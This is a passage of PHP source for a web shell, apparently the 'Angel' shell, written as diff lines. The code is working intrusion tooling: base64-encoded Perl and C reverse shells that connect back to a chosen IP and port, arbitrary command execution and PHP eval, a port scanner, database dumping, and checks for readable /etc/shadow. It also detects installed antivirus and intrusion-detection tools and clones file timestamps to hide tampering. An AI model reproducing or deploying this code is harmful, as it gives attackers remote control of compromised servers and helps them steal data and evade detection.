          '); + break; + case 1: + if (strtolower(substr($query,0,13)) == 'select * from') { + $allowedit = 1; + } + if ($getnumsql) { + $tatol = mysql_num_rows(q($getnumsql)); + $multipage = multi($tatol, $pagenum, $page, $tablename); + } + if (!$tablename) { + $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); + $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); + preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); + $tablename = $matches[1][0]; + } + + /*********************/ + $getfield = q("SHOW COLUMNS FROM $tablename"); + $rowdb = array(); + $keyfied = ''; //ֶ + while($row = @mysql_fetch_assoc($getfield)) { + $rowdb[$row['Field']]['Key'] = $row['Key']; + $rowdb[$row['Field']]['Extra'] = $row['Extra']; + if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') { + $keyfied = $row['Field']; + } + } + /*********************/ + //ֱ + if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') { + $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query); + } + + $result = q($query); + + p($multipage); + p(''); + p(''); + if ($allowedit) p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + p(""); + } + p(''); + + while($mn = @mysql_fetch_assoc($result)){ + $thisbg = bg(); + p(''); + $where = $tmp = $b1 = ''; + //ѡȡֶ + foreach($mn as $key=>$inside){ + if ($inside) { + //ΨһԡԶӵֶΣҵֶֹͣΪ + if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') { + $where = $key."='".addslashes($inside)."'"; + break; + } + $where .= $tmp.$key."='".addslashes($inside)."'"; + $tmp = ' AND '; + } + } + //ȡ¼ + foreach($mn as $key=>$inside){ + $b1 .= ''; + } + $where = base64_encode($where); + + if ($allowedit) p(''); + + p($b1); + p(''); + unset($b1); + } + p(''); + if ($allowedit) p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + p(""); + } + p(''); + tbfoot(); + p($multipage); + break; + case 2: + $ar = mysql_affected_rows(); + p('

          affected rows : '.$ar.'

          '); + break; + } + } + } + } + } else { + $query = q("SHOW TABLE STATUS"); + $table_num = $table_rows = $data_size = 0; + $tabledb = array(); + while($table = mysql_fetch_array($query)) { + $data_size = $data_size + $table['Data_length']; + $table_rows = $table_rows + $table['Rows']; + $table['Data_length'] = sizecount($table['Data_length']); + $table_num++; + $tabledb[] = $table; + } + $data_size = sizecount($data_size); + unset($table); + p('
          Action$name
          $type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
          '.html_clean($inside).' Edit | Del
          Action$name
          $type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
          '); + p(''); + makehide('action','mysqladmin'); + p($dbform); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + foreach ($tabledb as $key => $table) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + + p(""); + makehide('doing','backupmysql'); + formfoot(); + p("
           NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
          '.$table['Name'].''.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].' '.$table['Update_time'].' '.$table['Engine'].''.$table['Collation'].'Insert | Structure | Drop
          NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
           Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
          Save as file
          "); + fr($query); + } + } + } + tbfoot(); + @mysql_close(); +}//end mysql + +elseif ($action == 'backconnect') { + !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; + !$yourport && $yourport = '12345'; + $usedb = array('perl'=>'perl','c'=>'c'); + + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". + "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + + if ($start && $yourip && $yourport && $use){ + if ($use == 'perl') { + cf('/tmp/angel_bc',$back_connect); + $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); + } else { + cf('/tmp/angel_bc.c',$back_connect_c); + $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/angel_bc.c'); + $res = execute("/tmp/angel_bc $yourip $yourport &"); + } + m("Now script try connect to $yourip port $yourport ..."); + } + + formhead(array('title'=>'Back Connect')); + makehide('action','backconnect'); + p('

          '); + p('Your IP:'); + makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); + p('Your Port:'); + makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); + p('Use:'); + makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); + makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); + p('

          '); + formfoot(); +}//end + +elseif ($action == 'portscan') { + !$scanip && $scanip = '127.0.0.1'; + !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958'; + formhead(array('title'=>'Port Scan')); + makehide('action','portscan'); + p('

          '); + p('IP:'); + makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip)); + p('Port:'); + makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport)); + makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt')); + p('

          '); + formfoot(); + + if ($startscan) { + p('

          Result »

          '); + p('
            '); + foreach(explode(',', $scanport) as $port) { + $fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1); + if (!$fp) { + p('
          • '.$scanip.':'.$port.' ------------------------ Close
          • '); + } else { + p('
          • '.$scanip.':'.$port.' ------------------------ Open
          • '); + @fclose($fp); + } + } + p('
          '); + } +} + +elseif ($action == 'eval') { + $phpcode = trim($phpcode); + if($phpcode){ + if (!preg_match('#<\?#si', $phpcode)) { + $phpcode = ""; + } + eval("?".">$phpcode'Eval PHP Code')); + makehide('action','eval'); + maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); + p('

          Get plugins

          '); + formfooter(); +}//end eval + +elseif ($action == 'editfile') { + if(file_exists($opfile)) { + $fp=@fopen($opfile,'r'); + $contents=@fread($fp, filesize($opfile)); + @fclose($fp); + $contents=htmlspecialchars($contents); + } + formhead(array('title'=>'Create / Edit File')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); + maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); + formfooter(); + + goback(); + +}//end editfile + +elseif ($action == 'newtime') { + $opfilemtime = @filemtime($opfile); + //$time = strtotime("$year-$month-$day $hour:$minute:$second"); + $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); + formhead(array('title'=>'Clone folder/file was last modified time')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); + formfooter(); + formhead(array('title'=>'Set last modified')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + p('

          year:'); + makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); + p('month:'); + makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); + p('day:'); + makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); + p('hour:'); + makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); + p('minute:'); + makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); + p('second:'); + makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); + p('

          '); + formfooter(); + goback(); +}//end newtime + +elseif ($action == 'shell') { + if (IS_WIN && IS_COM) { + if($program && $parameter) { + $shell= new COM('Shell.Application'); + $a = $shell->ShellExecute($program,$parameter); + m('Program run has '.(!$a ? 'success' : 'fail')); + } + !$program && $program = 'c:\windows\system32\cmd.exe'; + !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; + formhead(array('title'=>'Execute Program')); + makehide('action','shell'); + makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); + p('

          '); + makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

          '); + formfoot(); + } + formhead(array('title'=>'Execute Command')); + makehide('action','shell'); + if (IS_WIN && IS_COM) { + $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); + makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); + } + p('

          '); + makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command))); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

          '); + formfoot(); + + if ($command) { + p('
          ');
          +		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
          +			$wsh = new COM('WScript.shell');
          +			$exec = $wsh->exec('cmd.exe /c '.$command);
          +			$stdout = $exec->StdOut();
          +			$stroutput = $stdout->ReadAll();
          +			echo $stroutput;
          +		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
          +			$descriptorspec = array(
          +			   0 => array('pipe', 'r'),
          +			   1 => array('pipe', 'w'),
          +			   2 => array('pipe', 'w')
          +			);
          +			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
          +			if (is_resource($process)) {
          +				fwrite($pipes[0], $command."\r\n");
          +				fwrite($pipes[0], "exit\r\n");
          +				fclose($pipes[0]);
          +				while (!feof($pipes[1])) {
          +					echo fgets($pipes[1], 1024);
          +				}
          +				fclose($pipes[1]);
          +				while (!feof($pipes[2])) {
          +					echo fgets($pipes[2], 1024);
          +				}
          +				fclose($pipes[2]);
          +				proc_close($process);
          +			}
          +		} else {
          +			echo(execute($command));
          +		}
          +		p('
          '); + } +}//end shell + +elseif ($action == 'phpenv') { + $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; + $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); + !$dis_func && $dis_func = 'No'; + $info = array( + 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), + 2 => array('Server Domain',$_SERVER['SERVER_NAME']), + 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), + 4 => array('Server OS',PHP_OS), + 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), + 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), + 8 => array('PHP run mode',strtoupper(php_sapi_name())), + 9 => array('The file path',__FILE__), + + 10 => array('PHP Version',PHP_VERSION), + 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), + 12 => array('Safe Mode',getcfg('safe_mode')), + 13 => array('Administrator',$adminmail), + 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), + 15 => array('enable_dl',getcfg('enable_dl')), + 16 => array('display_errors',getcfg('display_errors')), + 17 => array('register_globals',getcfg('register_globals')), + 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), + 19 => array('memory_limit',getcfg('memory_limit')), + 20 => array('post_max_size',getcfg('post_max_size')), + 21 => array('upload_max_filesize',$upsize), + 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), + 23 => array('disable_functions',$dis_func), + ); + + if($phpvarname) { + m($phpvarname .' : '.getcfg($phpvarname)); + } + + formhead(array('title'=>'Server environment')); + makehide('action','phpenv'); + makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); + formfooter(); + + $hp = array(0=> 'Server', 1=> 'PHP'); + for($a=0;$a<2;$a++) { + p('

          '.$hp[$a].' »

          '); + p('
            '); + if ($a==0) { + for($i=1;$i<=9;$i++) { + p('
          • '.$info[$i][0].':'.$info[$i][1].'
          • '); + } + } elseif ($a == 1) { + for($i=10;$i<=23;$i++) { + p('
          • '.$info[$i][0].':'.$info[$i][1].'
          • '); + } + } + p('
          '); + } +}//end phpenv + +elseif ($action == 'secinfo') { + + secparam('Server software', @getenv('SERVER_SOFTWARE')); + secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); + secparam('Open base dir', @ini_get('open_basedir')); + secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + secparam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + secparam('cURL support', function_exists('curl_version')?'enabled':'no'); + $temp=array(); + if(function_exists('mysql_get_client_info')) + $temp[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $temp[] = "MSSQL"; + if(function_exists('pg_connect')) + $temp[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $temp[] = "Oracle"; + secparam('Supported databases', implode(', ', $temp)); + + if( !IS_WIN ) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no'); + secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no'); + secparam('OS version', @file_get_contents('/proc/version')); + secparam('Distr name', @file_get_contents('/etc/issue.net')); + $safe_mode = @ini_get('safe_mode'); + if(!$GLOBALS['safe_mode']) { + $temp=array(); + foreach ($userful as $item) + if(which($item)){$temp[]=$item;} + secparam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $item) + if(which($item)){$temp[]=$item;} + secparam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $item) + if(which($item)){$temp[]=$item;} + secparam('Downloaders', implode(', ',$temp)); + secparam('Hosts', @file_get_contents('/etc/hosts')); + secparam('HDD space', execute('df -h')); + secparam('Mount options', @file_get_contents('/etc/fstab')); + } + } else { + secparam('OS Version',execute('ver')); + secparam('Account Settings',execute('net accounts')); + secparam('User Accounts',execute('net user')); + secparam('IP Configurate',execute('ipconfig -all')); + } +}//end + +else { + m('Undefined Action'); +} + +?> + +
          + + Powered by 2011. Copyright (C) 2012 ̿ All Rights Reserved. +
          + + + +'.$n.' »'); + p('
          '); + if(strpos($v, "\n") === false) + p($v.'
          '); + else + p('
          '.$v.'
          '); + p('
          '); + } +} +function m($msg) { + echo '
          '; + echo $msg; + echo '
          '; +} +function scookie($key, $value, $life = 0, $prefix = 1) { + global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife; + $key = ($prefix ? $cookiepre : '').$key; + $life = $life ? $life : $cookielife; + $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; + setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport); +} +function multi($num, $perpage, $curpage, $tablename) { + $multipage = ''; + if($num > $perpage) { + $page = 10; + $offset = 5; + $pages = @ceil($num / $perpage); + if($page > $pages) { + $from = 1; + $to = $pages; + } else { + $from = $curpage - $offset; + $to = $curpage + $page - $offset - 1; + if($from < 1) { + $to = $curpage + 1 - $from; + $from = 1; + if(($to - $from) < $page && ($to - $from) < $pages) { + $to = $page; + } + } elseif($to > $pages) { + $from = $curpage - $pages + $to; + $to = $pages; + if(($to - $from) < $page && ($to - $from) < $pages) { + $from = $pages - $page + 1; + } + } + } + $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); + for($i = $from; $i <= $to; $i++) { + $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; + } + $multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); + $multipage = $multipage ? '

          Pages: '.$multipage.'

          ' : ''; + } + return $multipage; +} +// ½ +function loginpage() { +?> + + + Password: + + + +Can not connect to MySQL server'); + exit; + } + if($link && $dbname) { + if (!@mysql_select_db($dbname, $link)) { + p('

          Database selected has error

          '); + exit; + } + } + if($link && mysql_get_server_info() > '4.1') { + if($charset && in_array(strtolower($charset), $charsetdb)) { + q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); + } + } + return $link; +} + +// ȥתַ +function s_array(&$array) { + if (is_array($array)) { + foreach ($array as $k => $v) { + $array[$k] = s_array($v); + } + } else if (is_string($array)) { + $array = stripslashes($array); + } + return $array; +} + +// HTML +function html_clean($content) { + $content = htmlspecialchars($content); + $content = str_replace("\n", "
          ", $content); + $content = str_replace(" ", "  ", $content); + $content = str_replace("\t", "    ", $content); + return $content; +} + +// ȡȨ +function getChmod($filepath){ + return substr(base_convert(@fileperms($filepath),10,8),-4); +} + +function getPerms($filepath) { + $mode = @fileperms($filepath); + if (($mode & 0xC000) === 0xC000) {$type = 's';} + elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} + elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} + elseif (($mode & 0x8000) === 0x8000) {$type = '-';} + elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} + elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} + elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} + else {$type = '?';} + + $owner['read'] = ($mode & 00400) ? 'r' : '-'; + $owner['write'] = ($mode & 00200) ? 'w' : '-'; + $owner['execute'] = ($mode & 00100) ? 'x' : '-'; + $group['read'] = ($mode & 00040) ? 'r' : '-'; + $group['write'] = ($mode & 00020) ? 'w' : '-'; + $group['execute'] = ($mode & 00010) ? 'x' : '-'; + $world['read'] = ($mode & 00004) ? 'r' : '-'; + $world['write'] = ($mode & 00002) ? 'w' : '-'; + $world['execute'] = ($mode & 00001) ? 'x' : '-'; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} + if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} + if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} + + return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; +} + +function getUser($filepath) { + if (function_exists('posix_getpwuid')) { + $array = @posix_getpwuid(@fileowner($filepath)); + if ($array && is_array($array)) { + return ' / '.$array['name'].''; + } + } + return ''; +} + +// ɾĿ¼ +function deltree($deldir) { + $mydir=@dir($deldir); + while($file=$mydir->read()) { + if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { + @chmod($deldir.'/'.$file,0777); + deltree($deldir.'/'.$file); + } + if (is_file($deldir.'/'.$file)) { + @chmod($deldir.'/'.$file,0777); + @unlink($deldir.'/'.$file); + } + } + $mydir->close(); + @chmod($deldir,0777); + return @rmdir($deldir) ? 1 : 0; +} + +// мıɫ滻 +function bg() { + global $bgc; + return ($bgc++%2==0) ? 'alt1' : 'alt2'; +} + +// ȡǰļϵͳ· +function getPath($scriptpath, $nowpath) { + if ($nowpath == '.') { + $nowpath = $scriptpath; + } + $nowpath = str_replace('\\', '/', $nowpath); + $nowpath = str_replace('//', '/', $nowpath); + if (substr($nowpath, -1) != '/') { + $nowpath = $nowpath.'/'; + } + return $nowpath; +} + +// ȡǰĿ¼ϼĿ¼ +function getUpPath($nowpath) { + $pathdb = explode('/', $nowpath); + $num = count($pathdb); + if ($num > 2) { + unset($pathdb[$num-1],$pathdb[$num-2]); + } + $uppath = implode('/', $pathdb).'/'; + $uppath = str_replace('//', '/', $uppath); + return $uppath; +} + +// PHPò +function getcfg($varname) { + $result = get_cfg_var($varname); + if ($result == 0) { + return 'No'; + } elseif ($result == 1) { + return 'Yes'; + } else { + return $result; + } +} + +// 麯 +function getfun($funName) { + return (false !== function_exists($funName)) ? 'Yes' : 'No'; +} + +// ļչ +function getext($file) { + $info = pathinfo($file); + return $info['extension']; +} + +function GetWDirList($dir){ + global $dirdata,$j,$nowpath; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + if (is_writable($f)) { + $dirdata[$j]['filename']=str_replace($nowpath,'',$f); + $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $dirdata[$j]['dirchmod']=getChmod($f); + $dirdata[$j]['dirperm']=getPerms($f); + $dirdata[$j]['dirlink']=$dir; + $dirdata[$j]['server_link']=$f; + $j++; + } + GetWDirList($f); + } + } + closedir($dh); + clearstatcache(); + return $dirdata; + } else { + return array(); + } +} + +function GetWFileList($dir){ + global $filedata,$j,$nowpath, $writabledb; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $ext = getext($file); + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + GetWFileList($f); + } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){ + if (is_writable($f)) { + $filedata[$j]['filename']=str_replace($nowpath,'',$f); + $filedata[$j]['size']=sizecount(@filesize($f)); + $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $filedata[$j]['filechmod']=getChmod($f); + $filedata[$j]['fileperm']=getPerms($f); + $filedata[$j]['fileowner']=getUser($f); + $filedata[$j]['dirlink']=$dir; + $filedata[$j]['server_link']=$f; + $j++; + } + } + } + closedir($dh); + clearstatcache(); + return $filedata; + } else { + return array(); + } +} + +function GetSFileList($dir, $content, $re = 0) { + global $filedata,$j,$nowpath, $writabledb; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $ext = getext($file); + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + GetSFileList($f, $content, $re = 0); + } elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){ + $find = 0; + if ($re) { + if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){ + $find = 1; + } + } else { + if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) { + $find = 1; + } + } + if ($find) { + $filedata[$j]['filename']=str_replace($nowpath,'',$f); + $filedata[$j]['size']=sizecount(@filesize($f)); + $filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $filedata[$j]['filechmod']=getChmod($f); + $filedata[$j]['fileperm']=getPerms($f); + $filedata[$j]['fileowner']=getUser($f); + $filedata[$j]['dirlink']=$dir; + $filedata[$j]['server_link']=$f; + $j++; + } + } + } + closedir($dh); + clearstatcache(); + return $filedata; + } else { + return array(); + } +} + +function qy($sql) { + //echo $sql.'
          '; + $res = $error = ''; + if(!$res = @mysql_query($sql)) { + return 0; + } else if(is_resource($res)) { + return 1; + } else { + return 2; + } + return 0; +} + +function q($sql) { + return @mysql_query($sql); +} + +function fr($qy){ + mysql_free_result($qy); +} + +function sizecount($fileSize) { + $size = sprintf("%u", $fileSize); + if($size == 0) { + return '0 Bytes' ; + } + $sizename = array(' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB'); + return round( $size / pow(1024, ($i = floor(log($size, 1024)))), 2) . $sizename[$i]; +} + +// ݿ +function sqldumptable($table, $fp=0) { + + $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; + $res = q('SHOW CREATE TABLE `'.$table.'`'); + $create = mysql_fetch_array($res); + $tabledump .= $create[1].";\n\n"; + + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + $tabledump = ''; + $rows = q("SELECT * FROM $table"); + while ($row = mysql_fetch_assoc($rows)) { + foreach($row as $k=>$v) { + $row[$k] = "'".@mysql_real_escape_string($v)."'"; + } + $tabledump = 'INSERT INTO `'.$table.'` VALUES ('.implode(", ", $row).');'."\n"; + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + } + fr($rows); +} + +function p($str){ + echo $str."\n"; +} + +function tbhead() { + p(''); +} +function tbfoot(){ + p('
          '); +} + +function makehide($name,$value=''){ + p(""); +} + +function makeinput($arg = array()){ + $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; + $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; + !$arg['type'] && $arg['type'] = 'text'; + $arg['title'] = $arg['title'] ? $arg['title'].'
          ' : ''; + $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; + if ($arg['newline']) { + p("

          $arg[title]

          "); + } else { + p("$arg[title]"); + } +} + +function makeselect($arg = array()){ + if ($arg['onchange']) { + $onchange = 'onchange="'.$arg['onchange'].'"'; + } + $arg['title'] = $arg['title'] ? $arg['title'] : ''; + if ($arg['newline']) p('

          '); + p("$arg[title] "); + if ($arg['newline']) p('

          '); +} +function formhead($arg = array()) { + global $self; + !$arg['method'] && $arg['method'] = 'post'; + !$arg['action'] && $arg['action'] = $self; + $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; + !$arg['name'] && $arg['name'] = 'form1'; + p("
          "); + if ($arg['title']) { + p('

          '.$arg['title'].' »

